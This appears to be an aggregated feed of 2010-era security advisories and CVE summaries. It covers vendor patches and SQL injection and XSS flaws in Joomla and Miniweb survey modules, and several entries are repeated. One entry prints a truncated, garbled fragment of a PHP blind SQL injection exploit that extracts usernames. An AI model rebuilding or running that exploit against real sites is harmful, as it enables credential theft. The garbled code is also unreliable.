Microsoft Releases Cumulative Security Update for Internet Explorer

Microsoft has released Security Bulletin MS10-002 as a Cumulative Security Update for Internet Explorer. This update addresses multiple vulnerabilities that when exploited, may allow an attacker to execute arbitrary code. US-CERT encourages users and administrators to review Microsoft Security...

Adobe Releases Shockwave Player Update

Adobe has released an update for Shockwave Player to address multiple vulnerabilities. These vulnerabilities affect Adobe Shockwave Player 11.5.2.602 and earlier versions for Windows and Macintosh. Exploitation of these vulnerabilities may allow an attacker to execute arbitrary code. US-CERT...

CVE-2009-4625

SQL injection vulnerability in the updateOnePage function in components/combfsurveypro/controller.php in BF Survey Pro Free combfsurveyprofree 1.2.4, and other versions before 1.2.6, a component for Joomla!, allows remote attackers to execute arbitrary SQL commands via the table parameter in an...

CVE-2009-4625

SQL injection vulnerability in the updateOnePage function in components/combfsurveypro/controller.php in BF Survey Pro Free combfsurveyprofree 1.2.4, and other versions before 1.2.6, a component for Joomla!, allows remote attackers to execute arbitrary SQL commands via the table parameter in an...

CVE-2009-4625

The CVE-2009-4625 entry concerns BF Survey Pro Free (com_bfsurvey_profree) for Joomla! where the updateOnePage action (table parameter) is vulnerable to SQL injection. Affected versions include 1.2.4 and other versions prior to 1.2.6. The vulnerability arises from improper validation of the table...

Adobe Releases Update for Adobe Reader and Acrobat

Adobe has released an update for Reader and Acrobat to address multiple vulnerabilities. These vulnerabilities affect Adobe Reader 9.2 and earlier versions for Windows, Macintosh, and UNIX and Adobe Acrobat 9.2 and earlier versions for Windows and Macintosh. Exploitation of these vulnerabilities...

Financial Industry Group Plans Cyber Attack Simulation

A financial services industry group is planning to simulate a series of cyber attacks to test how well banks, payment processors and retailers deal with online threats. Participants will be expected to activate their incident response procedures in accordance with the scenario presented and to...

VMware Releases Multiple Updates for ESX

VMware has released Security Advisory VMSA-2010-0001 to address multiple vulnerabilities in ESX Service Console packages for Network Security Services NSS and NetScape Portable Runtime NSPR. Exploitation of these vulnerabilities may allow an attacker to obtain sensitive information, cause a...

PowerDNS Recursor Update Addresses Multiple Vulnerabilities

PowerDNS has released PowerDNS Recursor 3.1.7.2 to address multiple vulnerabilities. Exploitation of these vulnerabilities may allow an attacker to execute arbitrary code, cause a denial-of-service condition, or spoof DNS information. US-CERT encourages users and administrators to review PowerDNS...

Microsoft Releases Advance Notification for January Security Bulletin

Microsoft has issued a Security Bulletin Advance Notification indicating that its January release cycle will contain one bulletin, which will have a severity rating of Critical. The notification states that this bulletin is for Microsoft Windows. Release of this bulletin is scheduled for Tuesday,...

Cross site scripting

Cross-site scripting XSS vulnerability in the Survey Pro module for Miniweb 2.0 allows remote attackers to inject arbitrary web script or HTML via the PATHINFO to index.php...

Sql injection

SQL injection vulnerability in the Survey Pro module for Miniweb 2.0 allows remote attackers to execute arbitrary SQL commands via the campaignid parameter in a results action to index.php...

CVE-2009-4551

SQL injection vulnerability in the Survey Pro module for Miniweb 2.0 allows remote attackers to execute arbitrary SQL commands via the campaignid parameter in a results action to index.php...

CVE-2009-4552

Cross-site scripting XSS vulnerability in the Survey Pro module for Miniweb 2.0 allows remote attackers to inject arbitrary web script or HTML via the PATHINFO to index.php...

CVE-2009-4552

CVE-2009-4552 is an XSS vulnerability in the Miniweb 2.0 Survey Pro module. It allows remote attackers to inject arbitrary script/HTML via PATH_INFO to index.php. Affected: Miniweb 2.0 (Survey Pro). Root cause: unsanitized PATH_INFO input leading to reflected script execution. Impact: client-side...

CVE-2009-4551

SQL injection vulnerability in the Survey Pro module for Miniweb 2.0 allows remote attackers to execute arbitrary SQL commands via the campaignid parameter in a results action to index.php...

CVE-2009-4552

Cross-site scripting XSS vulnerability in the Survey Pro module for Miniweb 2.0 allows remote attackers to inject arbitrary web script or HTML via the PATHINFO to index.php...

CVE-2009-4551

SQL injection vulnerability in the Survey Pro module for Miniweb 2.0 allows remote attackers to execute arbitrary SQL commands via the campaign_id parameter in a results action to index.php. Affected software: Miniweb 2.0, Survey Pro module. Impact as per NVD: base score 7.5 (HIGH). Exploitation ...

Joomla BF Survey Pro SQL Injection

1 $url = $argv1; $r = strlenfilegetcontents$url."+and+1=1--"; echo "\nExploiting:\n"; $w = strlenfilegetcontents$url."+and+1=0--"; $t = abs100-$w/$r100; echo "Username: "; for $i=1; $i $t-1 $count = $i; $i = 30; for $j = 1; $j $t-1 $laenge =...

Security Audits: Important but Rare

From eSecurityPlanet Larry Barrett Securing data networks is important enough for the majority of companies to hire outside security firms to audit their systems but only about one in three bother to have their network audited every year, according to a new survey conducted by VanDyke Software an...